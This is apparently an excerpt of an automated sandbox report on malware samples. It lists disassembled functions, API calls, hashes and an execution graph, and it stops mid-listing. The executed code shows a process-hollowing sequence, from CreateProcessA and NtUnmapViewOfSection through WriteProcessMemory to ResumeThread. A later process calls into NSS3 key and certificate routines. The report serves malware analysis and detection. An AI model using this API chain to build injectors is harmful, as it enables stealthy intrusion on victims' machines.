                                                            • String ID: eI.K$qs
                                                            • API String ID: 237503144-3936219367
                                                            • Opcode ID: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                            • Instruction ID: 7fef73d9758a2c6f60ec34812b9922d20771b8a95cfcf46f53da5b367a05cbc9
                                                            • Opcode Fuzzy Hash: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                            • Instruction Fuzzy Hash: B15164B0100B049BD734CF26C894BA7BBB5FB46314F544A5CE8A64FB89D7B0E409CB94
                                                            Function 02149107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 02149145
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                            • API String ID: 621844428-2804141084
                                                            • Opcode ID: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                            • Instruction ID: 225ea8cd0f85ffa97cfa24e19ffd924f5907eb3b7dfb24222cfd8bd42eceeb33
                                                            • Opcode Fuzzy Hash: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                            • Instruction Fuzzy Hash: 3BF01DB0CC87018FC714BF75964D26F7BA9AF55B30F014A2AD4AE82190DF348446CE93
                                                            Function 004131AE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00413884
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004138B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: V"
                                                            • API String ID: 237503144-2019076553
                                                            • Opcode ID: 856c4f6a3e30eb9153f14b8215bba94b29a403e190c90c0dbe90c268fa1ef07e
                                                            • Instruction ID: b8f590afc6553ff7605340d13dff726c6823d6bb3a5fa6397772a6377b5bee3a
                                                            • Opcode Fuzzy Hash: 856c4f6a3e30eb9153f14b8215bba94b29a403e190c90c0dbe90c268fa1ef07e
                                                            • Instruction Fuzzy Hash: F8E138B05483828BD735CF14C854BEFBBE1BFC5309F48492DE89987282D7B999448F96
                                                            Function 02153415 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 02153AEB
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 02153B1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: V"
                                                            • API String ID: 237503144-2019076553
                                                            • Opcode ID: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                            • Instruction ID: 83af03811d9a23237531512a70f6830c515c6bce2e457645248885e5e083968c
                                                            • Opcode Fuzzy Hash: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                            • Instruction Fuzzy Hash: 22E14AB05883828BE335CF14C854BAFBBE1BFC4355F48496DE8A987281D77A5545CF82
                                                            Function 0042B932 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysStringLen.OLEAUT32 ref: 0042B93C
                                                              • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeapString
                                                            • String ID: /$_
                                                            • API String ID: 983180023-3328996620
                                                            • Opcode ID: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                            • Instruction ID: 6447c4c98e9839bbfe30095b09fd38d16c8898c21f8e458fc47884f27b927c9d
                                                            • Opcode Fuzzy Hash: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                            • Instruction Fuzzy Hash: EBA1D372B097918FC3398A28C8903DFBBD2ABD5320F584A2DD4E9873D1DB359841C786
                                                            Function 0216BB99 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: /$_
                                                            • API String ID: 2568140703-3328996620
                                                            • Opcode ID: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                            • Instruction ID: e59c5f7d641e2ae3e5834379c29fb5de7a3f1471c5b7cfdc75f0150d0a2a8145
                                                            • Opcode Fuzzy Hash: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                            • Instruction Fuzzy Hash: 24A1A172A4D7818FC3298A28C8943EFBBD2ABD5314F194A6CD4E9873D1DB358941C742
                                                            Function 0042AA0F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysStringLen.OLEAUT32 ref: 0042AA1D
                                                              • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeapString
                                                            • String ID: /$_
                                                            • API String ID: 983180023-3328996620
                                                            • Opcode ID: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                            • Instruction ID: c0f22b295fcd5dfa813694d41399a3aed2f8b54868401d176934dc4335e9d724
                                                            • Opcode Fuzzy Hash: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                            • Instruction Fuzzy Hash: B291A5327093918FC725CE28C8903DBBBE2ABD5314F594A6DD8E9873D1D6359841CB47
                                                            Function 0216AC76 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: /$_
                                                            • API String ID: 2568140703-3328996620
                                                            • Opcode ID: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                            • Instruction ID: c90623b6401cffde80f800ac432d1bf549595163c214d07e71d83c03ad1481f2
                                                            • Opcode Fuzzy Hash: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                            • Instruction Fuzzy Hash: C491A5726493818FC339CA28C4547EEBBE2AFD5314F194A6DD4E9973D1DB369801CB42
                                                            Function 00422158 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 004222C9
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004222FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings$AllocateHeap
                                                            • String ID: hi
                                                            • API String ID: 3432729115-3633523372
                                                            • Opcode ID: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                            • Instruction ID: 955b234eacedc5ad79a5fbc0d5aeb5eb286d5c951f72c93c1ad7127c08102aad
                                                            • Opcode Fuzzy Hash: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                            • Instruction Fuzzy Hash: 3F5187B06083919FE324CF14D8807ABBBE5FBC5704F90892DF9999B280CB749805CB97
                                                            Function 021623BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02162530
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02162565
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: hi
                                                            • API String ID: 237503144-3633523372
                                                            • Opcode ID: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                            • Instruction ID: bf0e15ecb44c72fad2e49ae1c432e2c7174b552740852cee63707956b5c0247b
                                                            • Opcode Fuzzy Hash: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                            • Instruction Fuzzy Hash: 814146B06483859FE324CF54C894BAFBBE6FFC2740F80492CE9995B290C7748405CB92

                                                            Execution Graph

                                                            Execution Coverage:50.9%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:20.5%
                                                            Total number of Nodes:39
                                                            Total number of Limit Nodes:1
                                                            execution_graph 391 42db010 392 42db049 391->392 400 42db0e1 392->400 401 42d9850 392->401 396 42db115 419 42d9fb0 396->419 398 42db1a7 422 42da4f0 NtAllocateVirtualMemory 398->422 402 42d9875 401->402 403 42d9fb0 VirtualAlloc 402->403 405 42d990f 403->405 404 42d9921 404->396 413 42d9b10 404->413 405->404 406 42d9989 NtCreateFile 405->406 407 42d9a2b 406->407 409 42d9a34 406->409 408 42d9a36 CreateFileMappingA 407->408 407->409 411 42d9a94 MapViewOfFile 408->411 412 42d9a64 408->412 409->404 410 42d9abc FindCloseChangeNotification 409->410 410->404 411->409 412->409 412->411 414 42d9b5e 413->414 415 42d9b77 414->415 416 42d9c2d NtProtectVirtualMemory 414->416 415->396 431 42da150 416->431 420 42d9ff1 419->420 421 42da024 VirtualAlloc 420->421 421->398 423 42da580 422->423 424 42da6f7 GetTempFileNameA 423->424 433 42d9c90 424->433 426 42da71b CreateFileA WriteFile 427 42da780 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 42da82a 427->428 429 42da88e Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 42da851 WriteProcessMemory 428->430 429->400 430->428 432 42d9c5c NtProtectVirtualMemory 431->432 432->415 435 42d9c95 433->435 436 42da0d0 437 42d9fb0 VirtualAlloc 436->437 438 42da0dd 437->438

                                                            Callgraph

                                                            Executed Functions

                                                            Function 042DA4F0 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 317threadmemoryfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 042DA561
                                                            • GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 042DA714
                                                            • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 042DA742
                                                            • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 042DA76C
                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 042DA7B6
                                                            • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 042DA7D0
                                                            • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 042DA7FB
                                                            • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 042DA81F
                                                            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 042DA881
                                                            • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 042DA8AF
                                                            • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 042DA8DA
                                                            • ResumeThread.KERNELBASE(?), ref: 042DA8EC
                                                            • ExitProcess.KERNEL32(00000000), ref: 042DA8F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_42d9000_C9A7.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
                                                            • String ID: kate
                                                            • API String ID: 1984375786-4076676908
                                                            • Opcode ID: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                            • Instruction ID: e4f14b68739eca06174bda582b741813046cc1df65037366e0fad947e067c648
                                                            • Opcode Fuzzy Hash: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                            • Instruction Fuzzy Hash: DDE1E875A10209AFDB54CF84C895FEEB7B5BF88304F108199E908AB391D771AE85CF94
                                                            Function 042D9850 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191filenativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 042D9FB0: VirtualAlloc.KERNELBASE(00000000,042D990F,00003000,00000040), ref: 042DA034
                                                            • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 042D9A1B
                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 042D9ACC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_42d9000_C9A7.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                            • String ID: @
                                                            • API String ID: 482251274-2766056989
                                                            • Opcode ID: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                            • Instruction ID: bd96396f4d75e8c93ccaaa446efcccb752ee3ba39a5dc1a14ab55ca33d5e9c81
                                                            • Opcode Fuzzy Hash: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                            • Instruction Fuzzy Hash: 5F81EE75A10218AFDB24DF54DC55FDAB3B5AF48700F1481E9FA09AB290D7706A84CF94
                                                            Function 042D9B10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 59 42d9b10-42d9b75 call 42d9740 62 42d9b7e-42d9b93 59->62 63 42d9b77-42d9b79 59->63 65 42d9b9c-42d9bb4 62->65 66 42d9b95-42d9b97 62->66 64 42d9c81-42d9c84 63->64 67 42d9bbf-42d9bc9 65->67 66->64 68 42d9bcb-42d9bdb 67->68 69 42d9c17-42d9c1b 67->69 72 42d9bdd-42d9c13 68->72 73 42d9c15 68->73 70 42d9c1d-42d9c21 69->70 71 42d9c29-42d9c2b 69->71 70->71 74 42d9c23-42d9c27 70->74 71->64 72->69 73->67 74->71 76 42d9c2d-42d9c7c NtProtectVirtualMemory call 42da150 NtProtectVirtualMemory 74->76 76->64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_42d9000_C9A7.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .tex
                                                            • API String ID: 0-1946526065
                                                            • Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                            • Instruction ID: ee9c6706a568a0923de4e5d8cc97e4a373e9782ac261dad96862dd2f9f12c02f
                                                            • Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                            • Instruction Fuzzy Hash: 1751D7B1E10109DFDB04CF84C894BEEFBB5FF48314F148559E915AB280D775AA85CBA0
                                                            Function 042D9FB0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,042D990F,00003000,00000040), ref: 042DA034
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_42d9000_C9A7.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: VirtualAlloc
                                                            • API String ID: 4275171209-164498762
                                                            • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                            • Instruction ID: 1efe8f597713818d75180bb5a5ffe552834d583dc7332cb4ac17ba556c49bc8b
                                                            • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                            • Instruction Fuzzy Hash: 6D1112A0D082C9DEFF01DBE89809BEFBFB55F11708F044098D5446B282D6BA5758C7B6

                                                            Non-executed Functions

                                                            Function 6CA67C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA67C33
                                                            • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CA67C66
                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CA67D1E
                                                              • Part of subcall function 6CA67870: SECOID_FindOID_Util.NSS3(?,?,?,6CA691C5), ref: 6CA6788F
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA67D48
                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CA67D71
                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CA67DD3
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA67DE1
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA67DF8
                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA67E1A
                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CA67E58
                                                              • Part of subcall function 6CA67870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA691C5), ref: 6CA678BB
                                                              • Part of subcall function 6CA67870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CA691C5), ref: 6CA678FA
                                                              • Part of subcall function 6CA67870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CA691C5), ref: 6CA67930
                                                              • Part of subcall function 6CA67870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA691C5), ref: 6CA67951
                                                              • Part of subcall function 6CA67870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA67964
                                                              • Part of subcall function 6CA67870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA6797A
                                                              • Part of subcall function 6CA67870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CA67988
                                                              • Part of subcall function 6CA67870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CA67998
                                                              • Part of subcall function 6CA67870: free.MOZGLUE(00000000), ref: 6CA679A7
                                                              • Part of subcall function 6CA67870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CA691C5), ref: 6CA679BB
                                                              • Part of subcall function 6CA67870: PR_GetCurrentThread.NSS3(?,?,?,?,6CA691C5), ref: 6CA679CA
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA67E49
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA67F8C
                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA67F98
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA67FBF
                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA67FD9
                                                            • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CA68038
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CA68050
                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CA68093
                                                            • SECOID_FindOID_Util.NSS3 ref: 6CA67F29
                                                              • Part of subcall function 6CA607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA08298,?,?,?,6C9FFCE5,?), ref: 6CA607BF
                                                              • Part of subcall function 6CA607B0: PL_HashTableLookup.NSS3(?,?), ref: 6CA607E6
                                                              • Part of subcall function 6CA607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA6081B
                                                              • Part of subcall function 6CA607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA60825
                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CA68072
                                                            • SECOID_FindOID_Util.NSS3 ref: 6CA680F5
                                                              • Part of subcall function 6CA6BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CA6800A,00000000,?,00000000,?), ref: 6CA6BC3F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                            • String ID:
                                                            • API String ID: 2815116071-0
                                                            • Opcode ID: c686dd08f9021d352b45ddc07f65bc1f270f90a4d210efd5afcbcfa3af9df2e1
                                                            • Instruction ID: 8faedaaf691ed9fe1f5afa20ed695678d53e4eb7547fabb2a58b31fa97de48f6
                                                            • Opcode Fuzzy Hash: c686dd08f9021d352b45ddc07f65bc1f270f90a4d210efd5afcbcfa3af9df2e1
                                                            • Instruction Fuzzy Hash: 78E18C706183009FE700CF2AD980B5A77E5AF45708F19492DE99ADBF51E732EC89CB52
                                                            Function 6C9F1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 6C9F1C6B
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C9F1C75
                                                            • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C9F1CA1
                                                            • GetLengthSid.ADVAPI32(?), ref: 6C9F1CA9
                                                            • malloc.MOZGLUE(00000000), ref: 6C9F1CB4
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C9F1CCC
                                                            • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C9F1CE4
                                                            • GetLengthSid.ADVAPI32(?), ref: 6C9F1CEC
                                                            • malloc.MOZGLUE(00000000), ref: 6C9F1CFD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C9F1D0F
                                                            • CloseHandle.KERNEL32(?), ref: 6C9F1D17
                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 6C9F1D4D
                                                            • GetLastError.KERNEL32 ref: 6C9F1D73
                                                            • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C9F1D7F
                                                            Strings
                                                            • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C9F1D7A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                            • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                            • API String ID: 3748115541-1216436346
                                                            • Opcode ID: be8f3b4c8da5aec252488d27a554d1a99f27f89d4d7f4ddc88a5dc90986a7ed0
                                                            • Instruction ID: 8b884330efb93bdfa650526c655f934565b88b1876be1d1db62d708346fd48e5
                                                            • Opcode Fuzzy Hash: be8f3b4c8da5aec252488d27a554d1a99f27f89d4d7f4ddc88a5dc90986a7ed0
                                                            • Instruction Fuzzy Hash: 3C3163B5A00218AFEF10EF64CC48BAA7BB9FF4E348F444165F609A3150E7309994CF65
                                                            Function 6C9F3D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 6C9F3DFB
                                                            • __allrem.LIBCMT ref: 6C9F3EEC
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9F3FA3
